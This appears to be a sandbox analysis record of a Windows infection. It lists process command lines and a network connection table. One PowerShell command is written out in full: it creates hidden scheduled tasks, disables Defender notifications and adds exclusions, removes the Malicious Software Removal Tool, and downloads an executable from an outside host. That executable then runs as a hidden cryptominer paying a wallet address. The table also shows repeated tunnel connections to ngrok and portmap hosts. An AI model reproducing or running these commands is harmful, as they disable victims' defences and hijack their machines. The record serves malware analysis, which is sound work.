"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x104,0x128,0x7ff8ea8346f8,0x7ff8ea834708,0x7ff8ea834718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; wusa /uninstall /kb:890830 /quiet /norestart; Remove-Item -Path ''C:\Windows\System32\mrt.exe'' -Force -Confirm:$false; reg add ''HKLM\SOFTWARE\Policies\Microsoft\MRT'' /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64; New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; wusa /uninstall /kb:890830 /quiet /norestart; Remove-Item -Path ''C:\Windows\System32\mrt.exe'' -Force -Confirm:$false; reg add ''HKLM\SOFTWARE\Policies\Microsoft\MRT'' /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64; C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1qxhp6mn0h7k9r89w8amalqjn38t4j5yaa7t89rp.oFbSrB2Axq --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | wearedevs.net | udp |
| US | 104.26.6.147:80 | wearedevs.net | tcp |
| US | 104.26.6.147:80 | wearedevs.net | tcp |
| US | 104.26.6.147:443 | wearedevs.net | tcp |
| US | 8.8.8.8:53 | 147.6.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.wearedevs.net | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| FR | 142.250.201.162:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| GB | 74.125.133.155:443 | stats.g.doubleclick.net | tcp |
| FR | 216.58.214.67:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| FR | 142.250.179.78:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | 170.201.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.201.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.201.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.133.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.179.250.142.in-addr.arpa | udp |
| FR | 142.250.179.78:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| FR | 142.250.179.97:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.179.250.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| FR | 142.250.179.98:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| FR | 142.250.178.129:443 | ep2.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| FR | 142.250.201.162:443 | googleads.g.doubleclick.net | udp |
| FR | 142.250.178.129:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 216.58.214.161:443 | tpc.googlesyndication.com | tcp |
| FR | 216.58.214.161:443 | tpc.googlesyndication.com | tcp |
| FR | 216.58.214.161:443 | tpc.googlesyndication.com | tcp |
| FR | 216.58.214.161:443 | tpc.googlesyndication.com | tcp |
| FR | 216.58.214.161:443 | tpc.googlesyndication.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.20.217.172.in-addr.arpa | udp |
| FR | 216.58.214.161:443 | tpc.googlesyndication.com | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 195.20.217.172.in-addr.arpa | udp |
| GB | 2.16.153.198:443 | www.bing.com | tcp |
| GB | 2.16.153.198:443 | www.bing.com | tcp |
| FR | 142.250.179.98:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 198.153.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.16.153.224:443 | r.bing.com | tcp |
| GB | 2.16.153.224:443 | r.bing.com | tcp |
| GB | 23.73.138.82:443 | th.bing.com | tcp |
| GB | 23.73.138.82:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 224.153.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.138.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 20.190.160.20:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.111.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.tcp.ngrok.io | udp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 168.61.222.215:5400 | tcp | |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| GB | 2.16.153.222:443 | www.bing.com | tcp |
| GB | 2.16.153.222:443 | www.bing.com | tcp |
| GB | 2.16.153.222:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 222.153.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | delta-executor.com | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.4.4:53 | google.com | udp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 168.61.222.215:5400 | tcp | |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.16.153.206:443 | th.bing.com | tcp |
| GB | 2.16.153.222:443 | th.bing.com | tcp |
| GB | 2.16.153.222:443 | th.bing.com | tcp |
| GB | 2.16.153.206:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 204.79.197.200:443 | bing.com | tcp |
| US | 8.8.8.8:53 | 206.153.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| FR | 185.136.161.124:6128 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| FR | 185.136.161.124:6128 | tcp | |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 168.61.222.215:5400 | tcp | |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 8.8.8.8:53 | 0.tcp.ngrok.io | udp |
| US | 18.190.63.84:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 104.18.12.149:443 | sourceforge.net | tcp |
| US | 104.18.12.149:443 | sourceforge.net | tcp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 104.18.94.41:443 | challenges.cloudflare.com | tcp |
| US | 104.18.94.41:443 | challenges.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 149.12.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.94.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 8.8.8.8:53 | a.fsdn.com | udp |
| US | 104.18.16.56:443 | a.fsdn.com | tcp |
| US | 104.18.16.56:443 | a.fsdn.com | tcp |
| US | 104.18.16.56:443 | a.fsdn.com | tcp |
| US | 104.18.16.56:443 | a.fsdn.com | tcp |
| US | 104.18.16.56:443 | a.fsdn.com | tcp |
| US | 104.18.16.56:443 | a.fsdn.com | tcp |
| US | 104.18.16.56:443 | a.fsdn.com | tcp |
| US | 104.18.16.56:443 | a.fsdn.com | tcp |
| US | 8.8.8.8:53 | d.delivery.consentmanager.net | udp |
| US | 8.8.8.8:53 | cdn.consentmanager.net | udp |
| US | 8.8.8.8:53 | c.sf-syn.com | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| GB | 84.17.50.9:443 | cdn.consentmanager.net | tcp |
| US | 104.18.5.227:443 | c.sf-syn.com | tcp |
| US | 8.8.8.8:53 | 56.16.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.50.17.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.5.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.98.230.87.in-addr.arpa | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 18.190.63.84:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| FR | 185.136.161.124:8761 | tcp | |
| US | 8.8.8.8:53 | 0.tcp.ngrok.io | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.12.245.36:19521 | 0.tcp.ngrok.io | tcp |
| FR | 185.136.161.124:8761 | tcp | |
| US | 8.8.8.8:53 | as.sourceforge.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | analytics.slashdotmedia.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | ml314.com | udp |
| US | 8.8.8.8:53 | j.6sc.co | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| FR | 216.58.213.66:443 | securepubads.g.doubleclick.net | tcp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| US | 172.64.147.137:443 | as.sourceforge.net | tcp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| GB | 23.48.165.145:443 | j.6sc.co | tcp |
| US | 168.61.222.215:5400 | tcp | |
| US | 8.8.8.8:53 | bt.dns-finder.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 34.117.77.79:443 | ml314.com | udp |
| US | 172.64.147.137:443 | as.sourceforge.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 172.67.134.120:443 | bt.dns-finder.com | tcp |
| US | 8.8.8.8:53 | ipv6.6sc.co | udp |
| US | 8.8.8.8:53 | c.6sc.co | udp |
| US | 8.8.8.8:53 | b.6sc.co | udp |
| GB | 23.48.165.145:443 | b.6sc.co | tcp |
| US | 172.64.147.137:443 | as.sourceforge.net | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| GB | 23.48.165.145:443 | b.6sc.co | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| FR | 216.58.213.66:443 | securepubads.g.doubleclick.net | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| NL | 185.89.210.46:443 | ib.adnxs.com | tcp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | tcp |
| US | 8.8.8.8:53 | 60.41.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.77.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.165.48.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.38.105.216.in-addr.arpa | udp |
| DE | 18.184.216.10:443 | ps.eyeota.net | tcp |
| IE | 52.212.200.255:443 | dpm.demdex.net | tcp |
| US | 8.8.8.8:53 | 70.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.134.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.20.217.172.in-addr.arpa | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| NL | 185.89.210.46:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 8.8.8.8:53 | 601cf9249ee5244a36f479b7d3c0c3fc.safeframe.googlesyndication.com | udp |
| FR | 142.250.179.98:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| FR | 216.58.214.65:443 | 601cf9249ee5244a36f479b7d3c0c3fc.safeframe.googlesyndication.com | tcp |
| US | 104.18.28.101:443 | cdn-ima.33across.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| FR | 18.155.129.56:443 | tags.crwdcntrl.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp |
| FR | 3.164.163.87:80 | crt.rootg2.amazontrust.com | tcp |
| FR | 142.250.178.129:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.200.212.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.216.184.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.28.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.129.155.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 8.8.8.8:53 | 5b0944898990b3cfd32417ac47b075e9.safeframe.googlesyndication.com | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 8.8.8.8:53 | 87.163.164.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.201.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.210.89.185.in-addr.arpa | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | us-u.openx.net | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | trc.taboola.com | udp |
| US | 151.101.193.44:443 | trc.taboola.com | tcp |
| US | 35.244.159.8:443 | us-u.openx.net | tcp |
| IE | 52.213.68.253:443 | sync.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| FR | 216.58.214.161:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 44.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.68.213.52.in-addr.arpa | udp |
| US | 35.71.131.137:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 137.131.71.35.in-addr.arpa | udp |
| FR | 142.250.179.98:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.12.245.36:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | downloads.sourceforge.net | udp |
| US | 8.8.8.8:53 | altushost-swe.dl.sourceforge.net | udp |
| SE | 79.142.76.130:443 | altushost-swe.dl.sourceforge.net | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 8.8.8.8:53 | 130.76.142.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.12.245.36:19521 | 0.tcp.ngrok.io | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 172.67.134.120:443 | bt.dns-finder.com | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 8.8.8.8:53 | a10e6fedb7d54fee8ad77ab8889190f1.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | loadus.exelator.com | udp |
| IE | 34.254.143.3:443 | loadus.exelator.com | tcp |
| US | 8.8.8.8:53 | 3.143.254.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 168.61.222.215:5400 | tcp | |
| FR | 185.136.161.124:6128 | tcp | |
| FR | 185.136.161.124:6128 | tcp | |
| US | 3.12.245.36:19521 | 0.tcp.ngrok.io | tcp |
| FR | 185.136.161.124:11614 | tcp | |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.12.245.36:19521 | 0.tcp.ngrok.io | tcp |
| FR | 185.136.161.124:11614 | tcp | |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 8.8.8.8:53 | 64a2eacc557d2430a7c0e83e10efb00d.safeframe.googlesyndication.com | udp |
| US | 3.12.245.36:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | blesblochem.com | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 34.227.7.138:80 | blesblochem.com | tcp |
| US | 34.227.7.138:80 | blesblochem.com | tcp |
| US | 8.8.8.8:53 | 138.7.227.34.in-addr.arpa | udp |
| US | 3.12.245.36:19521 | 0.tcp.ngrok.io | tcp |
| US | 34.227.7.138:80 | blesblochem.com | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.12.245.36:19521 | 0.tcp.ngrok.io | tcp |
| US | 168.61.222.215:5400 | tcp | |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| FR | 185.136.161.124:8761 | tcp | |
| FR | 185.136.161.124:8761 | tcp | |
| FR | 185.136.161.124:15822 | tcp | |
| US | 8.8.8.8:53 | 0.tcp.ngrok.io | udp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| FR | 185.136.161.124:15822 | tcp | |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 168.61.222.215:5400 | tcp | |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| US | 3.137.60.53:19521 | 0.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| FR | 185.136.161.124:11614 | tcp | |
| FR | 185.136.161.124:11614 | tcp | |
| US | 8.8.8.8:53 | startitit2-23969.portmap.host | udp |
| FR | 185.136.161.124:17443 | tcp | |
| US | 168.61.222.215:5400 | tcp | |
| US | 8.8.8.8:53 | igk.filexspace.com | udp |
| US | 104.21.16.1:443 | igk.filexspace.com | tcp |
| US | 104.21.16.1:443 | igk.filexspace.com | tcp |
